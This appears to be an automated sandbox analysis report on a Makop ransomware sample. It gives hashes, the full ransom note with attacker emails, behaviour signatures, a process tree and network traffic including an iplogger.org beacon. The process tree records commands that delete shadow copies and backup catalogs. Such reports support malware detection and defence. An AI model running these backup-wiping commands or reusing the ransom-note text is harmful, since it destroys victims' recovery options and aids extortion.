Overview

overview

10

Static

static

1

f64ecdec4c...ea.exe

windows7_x64

10

f64ecdec4c...ea.exe

windows10_x64

10

Resubmissions

09/03/2023, 20:01 UTC

230309-yrrgwsbf7v 10

22/12/2020, 13:17 UTC

201222-wsc3nmern2 10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22/12/2020, 13:17 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe

  • Size

    117KB

  • MD5

    f64ecdec4c84ac7ef0ca6c2ef4d94eea

  • SHA1

    7c88af3c8a27402da1d67cfaa1a02555f1c7945d

  • SHA256

    fc257f64a0279bb5ae221b968d3f38bbb7237a8475c165c5a8430fe6633e3fe6

  • SHA512

    87b8a1c6098a67a6a7f61e154deba8c16a5b421e5157183b40f808c23187ec46e046d7f4ac006d375fcf66000da7da588c9105f9acba5471604255d15c1ac8f7

Score
10/10
makoppersistenceransomwarespyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\readme-warning.txt

Family

makop

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: akzhq1010@tutanota.com or akzhq1010@cock.li .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don�t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
Emails

akzhq1010@tutanota.com

akzhq1010@cock.li

Signatures

  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

    ransomwaremakop
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
    "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
      "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe"
      2⤵
      • Modifies extensions of user files
      • Adds Run key to start application
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
        "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
        3⤵
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
          "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
          4⤵
            PID:1088
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:324
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:1052
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
        • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
          "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
          3⤵
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
            4⤵
              PID:1168
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:784
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:1808
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
            PID:1388

          Network

          • flag-unknown
            DNS
            iplogger.org
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            8.8.8.8:53
            Request
            iplogger.org
            IN A
            Response
            iplogger.org
            IN A
            88.99.66.31
          • flag-unknown
            GET
            https://iplogger.org/1Bucq7
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            88.99.66.31:443
            Request
            GET /1Bucq7 HTTP/1.1
            Referer: B023785B;2.16
            Host: iplogger.org
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Server: nginx
            Date: Tue, 22 Dec 2020 13:18:56 GMT
            Content-Type: image/png
            Transfer-Encoding: chunked
            Connection: keep-alive
            Set-Cookie: PHPSESSID=t47evsr94tu3qt6488e11e5i32; path=/; HttpOnly
            Pragma: no-cache
            Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
            Cache-Control: no-cache
            Expires: Thu, 01 Jan 1970 00:00:01 GMT
            Answers:
            whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
            Strict-Transport-Security: max-age=31536000; preload
            X-Frame-Options: DENY
          • flag-unknown
            DNS
            www.download.windowsupdate.com
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            8.8.8.8:53
            Request
            www.download.windowsupdate.com
            IN A
            Response
            www.download.windowsupdate.com
            IN CNAME
            wu-fg-shim.trafficmanager.net
            wu-fg-shim.trafficmanager.net
            IN CNAME
            2-01-3cf7-0009.cdx.cedexis.net
            2-01-3cf7-0009.cdx.cedexis.net
            IN CNAME
            wu.azureedge.net
            wu.azureedge.net
            IN CNAME
            wu.ec.azureedge.net
            wu.ec.azureedge.net
            IN CNAME
            wu.wpc.apr-52dd2.edgecastdns.net
            wu.wpc.apr-52dd2.edgecastdns.net
            IN CNAME
            hlb.apr-52dd2-0.edgecastdns.net
            hlb.apr-52dd2-0.edgecastdns.net
            IN CNAME
            cs11.wpc.v0cdn.net
            cs11.wpc.v0cdn.net
            IN A
            93.184.221.240
          • flag-unknown
            DNS
            crl.verisign.com
            Remote address:
            8.8.8.8:53
            Request
            crl.verisign.com
            IN A
            Response
            crl.verisign.com
            IN CNAME
            crl-symcprod.digicert.com
            crl-symcprod.digicert.com
            IN CNAME
            cs9.wac.phicdn.net
            cs9.wac.phicdn.net
            IN A
            72.21.91.29
          • 88.99.66.31:443
            https://iplogger.org/1Bucq7
            tls, http
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            876 B
             6.9kB
             9
            10

            HTTP Request

            GET https://iplogger.org/1Bucq7

            HTTP Response

            200
          • 8.8.8.8:53
            iplogger.org
            dns
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            58 B
             74 B
             1
            1

            DNS Request

            iplogger.org

            DNS Response

            88.99.66.31

          • 8.8.8.8:53
            www.download.windowsupdate.com
            dns
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            76 B
             325 B
             1
            1

            DNS Request

            www.download.windowsupdate.com

            DNS Response

            93.184.221.240

          • 8.8.8.8:53
            crl.verisign.com
            dns
            62 B
             146 B
             1
            1

            DNS Request

            crl.verisign.com

            DNS Response

            72.21.91.29

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1224-5-0x0000000000400000-0x000000000041F000-memory.dmp

            Filesize

            124KB

            Download

          • memory/1224-3-0x0000000000400000-0x000000000041F000-memory.dmp

            Filesize

            124KB

            Download

          • memory/1636-17-0x000007FEF5B70000-0x000007FEF5DEA000-memory.dmp

            Filesize

            2.5MB

            Download

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.